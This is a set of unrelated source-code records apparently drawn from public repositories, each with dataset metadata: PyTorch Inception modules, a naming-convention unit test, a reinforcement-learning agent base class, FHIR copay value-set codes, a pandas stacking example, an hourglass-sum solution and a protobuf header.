self.conv1.stddev = 0.01
self.fc = nn.Linear(768, num_classes)
self.fc.stddev = 0.001
def forward(self, x):
x = F.avg_pool2d(x, kernel_size=5, stride=3)
x = self.conv0(x)
x = self.conv1(x)
x = F.adaptive_avg_pool2d(x, (1, 1))
x = torch.flatten(x, 1)
x = self.fc(x)
return x
| <filename>Chapter4/ex_4_15.py<gh_stars>100-1000
""" 本代码可以被其它代码导入,作为模型的一部分
"""
# InceptionA 模块
class InceptionA(nn.Module):
def __init__(self, in_channels, pool_features):
super(InceptionA, self).__init__()
self.branch1x1 = BasicConv2d(in_channels, 64, kernel_size=1)
self.branch5x5_1 = BasicConv2d(in_channels, 48, kernel_size=1)
self.branch5x5_2 = BasicConv2d(48, 64, kernel_size=5, padding=2)
self.branch3x3dbl_1 = BasicConv2d(in_channels, 64, kernel_size=1)
self.branch3x3dbl_2 = BasicConv2d(64, 96, kernel_size=3, padding=1)
self.branch3x3dbl_3 = BasicConv2d(96, 96, kernel_size=3, padding=1)
self.branch_pool = BasicConv2d(in_channels, pool_features,
kernel_size=1)
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch5x5 = self.branch5x5_1(x)
branch5x5 = self.branch5x5_2(branch5x5)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)
branch_pool = F.avg_pool2d(x, kernel_size=3, stride=1, padding=1)
branch_pool = self.branch_pool(branch_pool)
outputs = [branch1x1, branch5x5, branch3x3dbl, branch_pool]
return torch.cat(outputs, 1)
# InceptionB 模块
class InceptionB(nn.Module):
def __init__(self, in_channels):
super(InceptionB, self).__init__()
self.branch3x3 = BasicConv2d(in_channels, 384, kernel_size=3,
stride=2)
self.branch3x3dbl_1 = BasicConv2d(in_channels, 64, kernel_size=1)
self.branch3x3dbl_2 = BasicConv2d(64, 96, kernel_size=3, padding=1)
self.branch3x3dbl_3 = BasicConv2d(96, 96, kernel_size=3, stride=2)
def forward(self, x):
branch3x3 = self.branch3x3(x)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)
branch_pool = F.max_pool2d(x, kernel_size=3, stride=2)
outputs = [branch3x3, branch3x3dbl, branch_pool]
return torch.cat(outputs, 1)
# InceptionC 模块
class InceptionC(nn.Module):
def __init__(self, in_channels, channels_7x7):
super(InceptionC, self).__init__()
self.branch1x1 = BasicConv2d(in_channels, 192, kernel_size=1)
c7 = channels_7x7
self.branch7x7_1 = BasicConv2d(in_channels, c7, kernel_size=1)
self.branch7x7_2 = BasicConv2d(c7, c7, kernel_size=(1, 7),
padding=(0, 3))
self.branch7x7_3 = BasicConv2d(c7, 192, kernel_size=(7, 1),
padding=(3, 0))
self.branch7x7dbl_1 = BasicConv2d(in_channels, c7, kernel_size=1)
self.branch7x7dbl_2 = BasicConv2d(c7, c7, kernel_size=(7, 1),
padding=(3, 0))
self.branch7x7dbl_3 = BasicConv2d(c7, c7, kernel_size=(1, 7),
padding=(0, 3))
self.branch7x7dbl_4 = BasicConv2d(c7, c7, kernel_size=(7, 1),
padding=(3, 0))
self.branch7x7dbl_5 = BasicConv2d(c7, 192, kernel_size=(1, 7),
padding=(0, 3))
self.branch_pool = BasicConv2d(in_channels, 192, kernel_size=1)
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch7x7 = self.branch7x7_1(x)
branch7x7 = self.branch7x7_2(branch7x7)
branch7x7 = self.branch7x7_3(branch7x7)
branch7x7dbl = self.branch7x7dbl_1(x)
branch7x7dbl = self.branch7x7dbl_2(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_3(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_4(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_5(branch7x7dbl)
branch_pool = F.avg_pool2d(x, kernel_size=3, stride=1, padding=1)
branch_pool = self.branch_pool(branch_pool)
outputs = [branch1x1, branch7x7, branch7x7dbl, branch_pool]
return torch.cat(outputs, 1)
# InceptionD 模块
class InceptionD(nn.Module):
def __init__(self, in_channels):
super(InceptionD, self).__init__()
self.branch3x3_1 = BasicConv2d(in_channels, 192, kernel_size=1)
self.branch3x3_2 = BasicConv2d(192, 320, kernel_size=3, stride=2)
self.branch7x7x3_1 = BasicConv2d(in_channels, 192, kernel_size=1)
self.branch7x7x3_2 = BasicConv2d(192, 192, kernel_size=(1, 7), padding=(0, 3))
self.branch7x7x3_3 = BasicConv2d(192, 192, kernel_size=(7, 1), padding=(3, 0))
self.branch7x7x3_4 = BasicConv2d(192, 192, kernel_size=3, stride=2)
def forward(self, x):
branch3x3 = self.branch3x3_1(x)
branch3x3 = self.branch3x3_2(branch3x3)
branch7x7x3 = self.branch7x7x3_1(x)
branch7x7x3 = self.branch7x7x3_2(branch7x7x3)
branch7x7x3 = self.branch7x7x3_3(branch7x7x3)
branch7x7x3 = self.branch7x7x3_4(branch7x7x3)
branch_pool = F.max_pool2d(x, kernel_size=3, stride=2)
outputs = [branch3x3, branch7x7x3, branch_pool]
return torch.cat(outputs, 1)
# InceptionE 模块
class InceptionE(nn.Module):
def __init__(self, in_channels):
super(InceptionE, self).__init__()
self.branch1x1 = BasicConv2d(in_channels, 320, kernel_size=1)
self.branch3x3_1 = BasicConv2d(in_channels, 384, kernel_size=1)
self.branch3x3_2a = BasicConv2d(384, 384, kernel_size=(1, 3),
padding=(0, 1))
self.branch3x3_2b = BasicConv2d(384, 384, kernel_size=(3, 1),
padding=(1, 0))
self.branch3x3dbl_1 = BasicConv2d(in_channels, 448, kernel_size=1)
self.branch3x3dbl_2 = BasicConv2d(448, 384, kernel_size=3, padding=1)
self.branch3x3dbl_3a = BasicConv2d(384, 384, kernel_size=(1, 3),
padding=(0, 1))
self.branch3x3dbl_3b = BasicConv2d(384, 384, kernel_size=(3, 1),
padding=(1, 0))
self.branch_pool = BasicConv2d(in_channels, 192, kernel_size=1)
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch3x3 = self.branch3x3_1(x)
branch3x3 = [
self.branch3x3_2a(branch3x3),
self.branch3x3_2b(branch3x3),
]
branch3x3 = torch.cat(branch3x3, 1)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl = [
self.branch3x3dbl_3a(branch3x3dbl),
self.branch3x3dbl_3b(branch3x3dbl),
]
branch3x3dbl = torch.cat(branch3x3dbl, 1)
branch_pool = F.avg_pool2d(x, kernel_size=3, stride=1, padding=1)
branch_pool = self.branch_pool(branch_pool)
outputs = [branch1x1, branch3x3, branch3x3dbl, branch_pool]
return torch.cat(outputs, 1)
# InceptionAux 模块
class InceptionAux(nn.Module):
def __init__(self, in_channels, num_classes):
super(InceptionAux, self).__init__()
self.conv0 = BasicConv2d(in_channels, 128, kernel_size=1)
self.conv1 = BasicConv2d(128, 768, kernel_size=5)
self.conv1.stddev = 0.01
self.fc = nn.Linear(768, num_classes)
self.fc.stddev = 0.001
def forward(self, x):
x = F.avg_pool2d(x, kernel_size=5, stride=3)
x = self.conv0(x)
x = self.conv1(x)
x = F.adaptive_avg_pool2d(x, (1, 1))
x = torch.flatten(x, 1)
x = self.fc(x)
return x
| zh | 0.88411 | 本代码可以被其它代码导入,作为模型的一部分 # InceptionA 模块 # InceptionB 模块 # InceptionC 模块 # InceptionD 模块 # InceptionE 模块 # InceptionAux 模块 | 2.561233 | 3 |
mapactionpy_controller/tests/test_check_naming_convention.py | mehulmj/mapactionpy_controller | 1 | 6612371 | from unittest import TestCase
import mapactionpy_controller.check_naming_convention as check_naming_convention
import mapactionpy_controller.name_convention as name_convention
from mapactionpy_controller.crash_move_folder import CrashMoveFolder
import os
import six
# works differently for python 2.7 and python 3.x
if six.PY2:
import mock # noqa: F401
from mock import mock_open, patch
else:
from unittest import mock # noqa: F401
from unittest.mock import mock_open, patch # noqa: F401
class TestCheckNamingConventionTool(TestCase):
def setUp(self):
self.parent_dir = os.path.dirname(
os.path.dirname(os.path.realpath(__file__)))
self.cmf_descriptor_path = os.path.join(
self.parent_dir, 'example', 'cmf_description_flat_test.json')
def test_get_single_file_checker(self):
cmf = CrashMoveFolder(self.cmf_descriptor_path)
nc_desc_path = os.path.join(self.parent_dir, 'example', 'data_naming_convention.json')
nc = name_convention.NamingConvention(nc_desc_path)
passing_path = '/path/to/some/gisdata/206_bldg/ken_bldg_bdg_py_s4_osm_pp.shp'
func = check_naming_convention.get_single_file_checker(passing_path, nc, cmf)
self.assertIn('parsable and valid', func().get_message)
failing_path = '/path/to/some/gisdata/202_admn/ken_admn_ad0_ln_s0_IEBC_pp_HDX.shp'
func = check_naming_convention.get_single_file_checker(failing_path, nc, cmf)
self.assertRaises(ValueError, func)
| from unittest import TestCase
import mapactionpy_controller.check_naming_convention as check_naming_convention
import mapactionpy_controller.name_convention as name_convention
from mapactionpy_controller.crash_move_folder import CrashMoveFolder
import os
import six
# works differently for python 2.7 and python 3.x
if six.PY2:
import mock # noqa: F401
from mock import mock_open, patch
else:
from unittest import mock # noqa: F401
from unittest.mock import mock_open, patch # noqa: F401
class TestCheckNamingConventionTool(TestCase):
def setUp(self):
self.parent_dir = os.path.dirname(
os.path.dirname(os.path.realpath(__file__)))
self.cmf_descriptor_path = os.path.join(
self.parent_dir, 'example', 'cmf_description_flat_test.json')
def test_get_single_file_checker(self):
cmf = CrashMoveFolder(self.cmf_descriptor_path)
nc_desc_path = os.path.join(self.parent_dir, 'example', 'data_naming_convention.json')
nc = name_convention.NamingConvention(nc_desc_path)
passing_path = '/path/to/some/gisdata/206_bldg/ken_bldg_bdg_py_s4_osm_pp.shp'
func = check_naming_convention.get_single_file_checker(passing_path, nc, cmf)
self.assertIn('parsable and valid', func().get_message)
failing_path = '/path/to/some/gisdata/202_admn/ken_admn_ad0_ln_s0_IEBC_pp_HDX.shp'
func = check_naming_convention.get_single_file_checker(failing_path, nc, cmf)
self.assertRaises(ValueError, func)
| en | 0.638704 | # works differently for python 2.7 and python 3.x # noqa: F401 # noqa: F401 # noqa: F401 | 2.217744 | 2 |
agent/base.py | mrernst/rl_robotics_research | 0 | 6612372 | <filename>agent/base.py
#!/usr/bin/python
# _____________________________________________________________________________
# ----------------
# import libraries
# ----------------
# standard libraries
# -----
from util.replay_buffer import ReplayBuffer
import numpy as np
import torch
import gym
import argparse
import os
import sys
import imageio
import base64
from gym.wrappers.monitoring import video_recorder
import glfw
# utilities
# -----
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
class Agent(object):
"""
Abstract Agent Base Class
"""
def __init__(self):
pass
def set_final_goal(self, fg):
self.fg = fg
def step(self, s, env, step, global_step=0, explore=False):
raise NotImplementedError
def append(self, step, s, a, n_s, r, d):
raise NotImplementedError
def train(self, global_step):
raise NotImplementedError
def end_step(self):
raise NotImplementedError
def end_episode(self, episode, logger=None):
raise NotImplementedError
def evaluate_policy(self, env, eval_episodes=10, render=False, save_video=False, sleep=-1, results_dir='./save', timestep=-1):
if save_video:
from OpenGL import GL
#env = gym.wrappers.Monitor(env, directory='video',
# write_upon_reset=True, force=True, resume=True, mode='evaluation')
os.makedirs(f'{results_dir}/video/', exist_ok = True)
video = imageio.get_writer(f'{results_dir}/video/t{timestep}.mp4', fps=30)
render = False
success = 0
rewards = []
env.evaluate = True
with torch.no_grad():
for e in range(eval_episodes):
obs = env.reset()
fg = obs['desired_goal']
fg_dim = fg.shape[0]
s = obs['observation']
done = False
reward_episode_sum = 0
step = 0
self.set_final_goal(fg)
while not done:
if render:
if hasattr(self, 'sg'):
env.render(subgoal=self.sg+s[:self.sg.shape[0]]) #if possible render subgoal
else:
env.render()
if sleep>0:
time.sleep(sleep)
a, r, n_s, done = self.step(s, env, step)
reward_episode_sum += r
s = n_s
step += 1
self.end_step()
if save_video:
if hasattr(self, 'sg'):
video.append_data(env.render(subgoal=self.sg+s[:self.sg.shape[0]], mode='rgb_array'))
else:
video.append_data(env.render(mode='rgb_array'))
else:
error = np.sqrt(np.sum(np.square(fg-s[:fg_dim])))
print(" " * 80 + "\r" +
'[Eval] Goal, Curr: (%02.2f, %02.2f, %02.2f, %02.2f) Error:%.2f'%(fg[0], fg[1], s[0], s[1], error), end='\r')
rewards.append(reward_episode_sum)
success += 1 if error <=5 else 0
# this is not suited for every environment, distance should be adapted
self.end_episode(e)
if hasattr(env, 'viewer') and render:
v = env.viewer
#env.viewer = None
glfw.destroy_window(v.window)
#del v
env.evaluate = False
return np.array(rewards), success/eval_episodes
| <filename>agent/base.py
#!/usr/bin/python
# _____________________________________________________________________________
# ----------------
# import libraries
# ----------------
# standard libraries
# -----
from util.replay_buffer import ReplayBuffer
import numpy as np
import torch
import gym
import argparse
import os
import sys
import imageio
import base64
from gym.wrappers.monitoring import video_recorder
import glfw
# utilities
# -----
sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
class Agent(object):
"""
Abstract Agent Base Class
"""
def __init__(self):
pass
def set_final_goal(self, fg):
self.fg = fg
def step(self, s, env, step, global_step=0, explore=False):
raise NotImplementedError
def append(self, step, s, a, n_s, r, d):
raise NotImplementedError
def train(self, global_step):
raise NotImplementedError
def end_step(self):
raise NotImplementedError
def end_episode(self, episode, logger=None):
raise NotImplementedError
def evaluate_policy(self, env, eval_episodes=10, render=False, save_video=False, sleep=-1, results_dir='./save', timestep=-1):
if save_video:
from OpenGL import GL
#env = gym.wrappers.Monitor(env, directory='video',
# write_upon_reset=True, force=True, resume=True, mode='evaluation')
os.makedirs(f'{results_dir}/video/', exist_ok = True)
video = imageio.get_writer(f'{results_dir}/video/t{timestep}.mp4', fps=30)
render = False
success = 0
rewards = []
env.evaluate = True
with torch.no_grad():
for e in range(eval_episodes):
obs = env.reset()
fg = obs['desired_goal']
fg_dim = fg.shape[0]
s = obs['observation']
done = False
reward_episode_sum = 0
step = 0
self.set_final_goal(fg)
while not done:
if render:
if hasattr(self, 'sg'):
env.render(subgoal=self.sg+s[:self.sg.shape[0]]) #if possible render subgoal
else:
env.render()
if sleep>0:
time.sleep(sleep)
a, r, n_s, done = self.step(s, env, step)
reward_episode_sum += r
s = n_s
step += 1
self.end_step()
if save_video:
if hasattr(self, 'sg'):
video.append_data(env.render(subgoal=self.sg+s[:self.sg.shape[0]], mode='rgb_array'))
else:
video.append_data(env.render(mode='rgb_array'))
else:
error = np.sqrt(np.sum(np.square(fg-s[:fg_dim])))
print(" " * 80 + "\r" +
'[Eval] Goal, Curr: (%02.2f, %02.2f, %02.2f, %02.2f) Error:%.2f'%(fg[0], fg[1], s[0], s[1], error), end='\r')
rewards.append(reward_episode_sum)
success += 1 if error <=5 else 0
# this is not suited for every environment, distance should be adapted
self.end_episode(e)
if hasattr(env, 'viewer') and render:
v = env.viewer
#env.viewer = None
glfw.destroy_window(v.window)
#del v
env.evaluate = False
return np.array(rewards), success/eval_episodes
| en | 0.472823 | #!/usr/bin/python # _____________________________________________________________________________ # ---------------- # import libraries # ---------------- # standard libraries # ----- # utilities # ----- Abstract Agent Base Class #env = gym.wrappers.Monitor(env, directory='video', # write_upon_reset=True, force=True, resume=True, mode='evaluation') #if possible render subgoal # this is not suited for every environment, distance should be adapted #env.viewer = None #del v | 2.21742 | 2 |
spark_auto_mapper_fhir/value_sets/coverage_copay_type_codes.py | imranq2/SparkAutoMapper.FHIR | 1 | 6612373 | <gh_stars>1-10
from __future__ import annotations
from spark_auto_mapper_fhir.fhir_types.uri import FhirUri
from spark_auto_mapper_fhir.value_sets.generic_type import GenericTypeCode
from spark_auto_mapper.type_definitions.defined_types import AutoMapperTextInputType
# This file is auto-generated by generate_classes so do not edit manually
# noinspection PyPep8Naming
class CoverageCopayTypeCodesCode(GenericTypeCode):
"""
CoverageCopayTypeCodes
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
This value set includes sample Coverage Copayment Type codes.
"""
def __init__(self, value: AutoMapperTextInputType):
super().__init__(value=value)
"""
http://terminology.hl7.org/CodeSystem/coverage-copay-type
"""
codeset: FhirUri = "http://terminology.hl7.org/CodeSystem/coverage-copay-type"
class CoverageCopayTypeCodesCodeValues:
"""
An office visit for a general practitioner of a discipline.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
GPOfficeVisit = CoverageCopayTypeCodesCode("gpvisit")
"""
An office visit for a specialist practitioner of a discipline
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
SpecialistOfficeVisit = CoverageCopayTypeCodesCode("spvisit")
"""
An episode in an emergency department.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
Emergency = CoverageCopayTypeCodesCode("emergency")
"""
An episode of an Inpatient hospital stay.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
InpatientHospital = CoverageCopayTypeCodesCode("inpthosp")
"""
A visit held where the patient is remote relative to the practitioner, e.g. by
phone, computer or video conference.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
Tele_visit = CoverageCopayTypeCodesCode("televisit")
"""
A visit to an urgent care facility - typically a community care clinic.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
UrgentCare = CoverageCopayTypeCodesCode("urgentcare")
"""
A standard percentage applied to all classes or service or product not
otherwise specified.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
CopayPercentage = CoverageCopayTypeCodesCode("copaypct")
"""
A standard fixed currency amount applied to all classes or service or product
not otherwise specified.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
CopayAmount = CoverageCopayTypeCodesCode("copay")
"""
The accumulated amount of patient payment before the coverage begins to pay
for services.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
Deductible = CoverageCopayTypeCodesCode("deductible")
"""
The maximum amout of payment for services which a patient, or family, is
expected to incur - typically annually.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
MaximumOutOfPocket = CoverageCopayTypeCodesCode("maxoutofpocket")
| from __future__ import annotations
from spark_auto_mapper_fhir.fhir_types.uri import FhirUri
from spark_auto_mapper_fhir.value_sets.generic_type import GenericTypeCode
from spark_auto_mapper.type_definitions.defined_types import AutoMapperTextInputType
# This file is auto-generated by generate_classes so do not edit manually
# noinspection PyPep8Naming
class CoverageCopayTypeCodesCode(GenericTypeCode):
"""
CoverageCopayTypeCodes
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
This value set includes sample Coverage Copayment Type codes.
"""
def __init__(self, value: AutoMapperTextInputType):
super().__init__(value=value)
"""
http://terminology.hl7.org/CodeSystem/coverage-copay-type
"""
codeset: FhirUri = "http://terminology.hl7.org/CodeSystem/coverage-copay-type"
class CoverageCopayTypeCodesCodeValues:
"""
An office visit for a general practitioner of a discipline.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
GPOfficeVisit = CoverageCopayTypeCodesCode("gpvisit")
"""
An office visit for a specialist practitioner of a discipline
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
SpecialistOfficeVisit = CoverageCopayTypeCodesCode("spvisit")
"""
An episode in an emergency department.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
Emergency = CoverageCopayTypeCodesCode("emergency")
"""
An episode of an Inpatient hospital stay.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
InpatientHospital = CoverageCopayTypeCodesCode("inpthosp")
"""
A visit held where the patient is remote relative to the practitioner, e.g. by
phone, computer or video conference.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
Tele_visit = CoverageCopayTypeCodesCode("televisit")
"""
A visit to an urgent care facility - typically a community care clinic.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
UrgentCare = CoverageCopayTypeCodesCode("urgentcare")
"""
A standard percentage applied to all classes or service or product not
otherwise specified.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
CopayPercentage = CoverageCopayTypeCodesCode("copaypct")
"""
A standard fixed currency amount applied to all classes or service or product
not otherwise specified.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
CopayAmount = CoverageCopayTypeCodesCode("copay")
"""
The accumulated amount of patient payment before the coverage begins to pay
for services.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
Deductible = CoverageCopayTypeCodesCode("deductible")
"""
The maximum amout of payment for services which a patient, or family, is
expected to incur - typically annually.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
MaximumOutOfPocket = CoverageCopayTypeCodesCode("maxoutofpocket") | en | 0.679782 | # This file is auto-generated by generate_classes so do not edit manually # noinspection PyPep8Naming CoverageCopayTypeCodes From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml This value set includes sample Coverage Copayment Type codes. http://terminology.hl7.org/CodeSystem/coverage-copay-type An office visit for a general practitioner of a discipline. From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml An office visit for a specialist practitioner of a discipline From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml An episode in an emergency department. From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml An episode of an Inpatient hospital stay. From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml A visit held where the patient is remote relative to the practitioner, e.g. by phone, computer or video conference. From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml A visit to an urgent care facility - typically a community care clinic. From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml A standard percentage applied to all classes or service or product not otherwise specified. From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml A standard fixed currency amount applied to all classes or service or product not otherwise specified. From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml The accumulated amount of patient payment before the coverage begins to pay for services. From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml The maximum amout of payment for services which a patient, or family, is expected to incur - typically annually. From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml | 1.999625 | 2 |
data_management/Excel Work/Stacking and Unstacking dataframes.py | TheRockerfly/JRocker-Portfolio | 0 | 6612374 | # -*- coding: utf-8 -*-
"""
Created on Sat Mar 17 06:07:26 2018
@author: James
"""
import pandas as pd
filename = ""
df = pd.read_csv(filename)
filename1 = ""
df1 = pd.read_csv(filename1)
# Stack the data (grouping the data)
# By stacking the data, we use less columns but more rows
df = df.stack(level="county")
print(df)
# Unstack
df = df.unstack(level="county")
print(df)
# By stacking and unstacking the data is stacked by different levels
# Now we are going to change the index using swaplevel
# Swap the levels of the index of newusers: newusers
df1 = df.swaplevel(0, 1)
# Print newusers and verify that the index is not sorted
print(df1)
# Sort the index of newusers: newusers
df1 = df1.sort_index()
# Print newusers and verify that the index is now sorted
print(df1)
# Test that the dataframe is equal to another
print(df.equals(df1))
| # -*- coding: utf-8 -*-
"""
Created on Sat Mar 17 06:07:26 2018
@author: James
"""
import pandas as pd
filename = ""
df = pd.read_csv(filename)
filename1 = ""
df1 = pd.read_csv(filename1)
# Stack the data (grouping the data)
# By stacking the data, we use less columns but more rows
df = df.stack(level="county")
print(df)
# Unstack
df = df.unstack(level="county")
print(df)
# By stacking and unstacking the data is stacked by different levels
# Now we are going to change the index using swaplevel
# Swap the levels of the index of newusers: newusers
df1 = df.swaplevel(0, 1)
# Print newusers and verify that the index is not sorted
print(df1)
# Sort the index of newusers: newusers
df1 = df1.sort_index()
# Print newusers and verify that the index is now sorted
print(df1)
# Test that the dataframe is equal to another
print(df.equals(df1))
| en | 0.822437 | # -*- coding: utf-8 -*- Created on Sat Mar 17 06:07:26 2018 @author: James # Stack the data (grouping the data) # By stacking the data, we use less columns but more rows # Unstack # By stacking and unstacking the data is stacked by different levels # Now we are going to change the index using swaplevel # Swap the levels of the index of newusers: newusers # Print newusers and verify that the index is not sorted # Sort the index of newusers: newusers # Print newusers and verify that the index is now sorted # Test that the dataframe is equal to another | 3.942086 | 4 |
matrix_array_sum/2d_grid_pattern_maxsum.py | codecakes/algorithms_monk | 0 | 6612375 | <reponame>codecakes/algorithms_monk<filename>matrix_array_sum/2d_grid_pattern_maxsum.py
#!/bin/python
"""
Context
Given a 2D Array, :
1 1 1 0 0 0
0 1 0 0 0 0
1 1 1 0 0 0
0 0 0 0 0 0
0 0 0 0 0 0
0 0 0 0 0 0
We define an hourglass in to be a subset of values with indices falling in this pattern in 's graphical representation:
a b c
d
e f g
There are hourglasses in , and an hourglass sum is the sum of an hourglass' values.
Task
Calculate the hourglass sum for every hourglass in , then print the maximum hourglass sum.
Input Format
There are lines of input, where each line contains space-separated integers describing 2D Array ; every value in will be in the inclusive range of to .
Constraints
Output Format
Print the largest (maximum) hourglass sum found in .
Sample Input
1 1 1 0 0 0
0 1 0 0 0 0
1 1 1 0 0 0
0 0 2 4 4 0
0 0 0 2 0 0
0 0 1 2 4 0
Sample Output
19
Explanation
contains the following hourglasses:
1 1 1 1 1 0 1 0 0 0 0 0
1 0 0 0
1 1 1 1 1 0 1 0 0 0 0 0
0 1 0 1 0 0 0 0 0 0 0 0
1 1 0 0
0 0 2 0 2 4 2 4 4 4 4 0
1 1 1 1 1 0 1 0 0 0 0 0
0 2 4 4
0 0 0 0 0 2 0 2 0 2 0 0
0 0 2 0 2 4 2 4 4 4 4 0
0 0 2 0
0 0 1 0 1 2 1 2 4 2 4 0
The hourglass with the maximum sum () is:
2 4 4
2
1 2 4
"""
def max_pattern_sum(arr, lo, hi, N, bound=3):
mid = lo + (hi-lo)/2
if lo < hi:
return max(max_pattern_sum(arr, lo, mid, N), max_pattern_sum(arr, mid+1, hi, N))
elif mid <= N-bound:
return max([sum((sum(arr[mid][c:c+bound]), arr[mid+1][c+1], sum(arr[mid+2][c:c+bound]))) for c in xrange(N-bound+1)])
return float('-inf')
arr = []
for arr_i in xrange(6):
arr.append( map(int,raw_input().strip().split(' ')) )
N = len(arr)
print max_pattern_sum(arr, 0, N-1, N) | #!/bin/python
"""
Context
Given a 2D Array, :
1 1 1 0 0 0
0 1 0 0 0 0
1 1 1 0 0 0
0 0 0 0 0 0
0 0 0 0 0 0
0 0 0 0 0 0
We define an hourglass in to be a subset of values with indices falling in this pattern in 's graphical representation:
a b c
d
e f g
There are hourglasses in , and an hourglass sum is the sum of an hourglass' values.
Task
Calculate the hourglass sum for every hourglass in , then print the maximum hourglass sum.
Input Format
There are lines of input, where each line contains space-separated integers describing 2D Array ; every value in will be in the inclusive range of to .
Constraints
Output Format
Print the largest (maximum) hourglass sum found in .
Sample Input
1 1 1 0 0 0
0 1 0 0 0 0
1 1 1 0 0 0
0 0 2 4 4 0
0 0 0 2 0 0
0 0 1 2 4 0
Sample Output
19
Explanation
contains the following hourglasses:
1 1 1 1 1 0 1 0 0 0 0 0
1 0 0 0
1 1 1 1 1 0 1 0 0 0 0 0
0 1 0 1 0 0 0 0 0 0 0 0
1 1 0 0
0 0 2 0 2 4 2 4 4 4 4 0
1 1 1 1 1 0 1 0 0 0 0 0
0 2 4 4
0 0 0 0 0 2 0 2 0 2 0 0
0 0 2 0 2 4 2 4 4 4 4 0
0 0 2 0
0 0 1 0 1 2 1 2 4 2 4 0
The hourglass with the maximum sum () is:
2 4 4
2
1 2 4
"""
def max_pattern_sum(arr, lo, hi, N, bound=3):
mid = lo + (hi-lo)/2
if lo < hi:
return max(max_pattern_sum(arr, lo, mid, N), max_pattern_sum(arr, mid+1, hi, N))
elif mid <= N-bound:
return max([sum((sum(arr[mid][c:c+bound]), arr[mid+1][c+1], sum(arr[mid+2][c:c+bound]))) for c in xrange(N-bound+1)])
return float('-inf')
arr = []
for arr_i in xrange(6):
arr.append( map(int,raw_input().strip().split(' ')) )
N = len(arr)
print max_pattern_sum(arr, 0, N-1, N) | en | 0.723075 | #!/bin/python Context Given a 2D Array, : 1 1 1 0 0 0 0 1 0 0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 We define an hourglass in to be a subset of values with indices falling in this pattern in 's graphical representation: a b c d e f g There are hourglasses in , and an hourglass sum is the sum of an hourglass' values. Task Calculate the hourglass sum for every hourglass in , then print the maximum hourglass sum. Input Format There are lines of input, where each line contains space-separated integers describing 2D Array ; every value in will be in the inclusive range of to . Constraints Output Format Print the largest (maximum) hourglass sum found in . Sample Input 1 1 1 0 0 0 0 1 0 0 0 0 1 1 1 0 0 0 0 0 2 4 4 0 0 0 0 2 0 0 0 0 1 2 4 0 Sample Output 19 Explanation contains the following hourglasses: 1 1 1 1 1 0 1 0 0 0 0 0 1 0 0 0 1 1 1 1 1 0 1 0 0 0 0 0 0 1 0 1 0 0 0 0 0 0 0 0 1 1 0 0 0 0 2 0 2 4 2 4 4 4 4 0 1 1 1 1 1 0 1 0 0 0 0 0 0 2 4 4 0 0 0 0 0 2 0 2 0 2 0 0 0 0 2 0 2 4 2 4 4 4 4 0 0 0 2 0 0 0 1 0 1 2 1 2 4 2 4 0 The hourglass with the maximum sum () is: 2 4 4 2 1 2 4 | 4.055578 | 4 |
src/indriya_msgs/python/projector_pb2.py | praveenv4k/Indriya | 1 | 6612376 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: projector.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
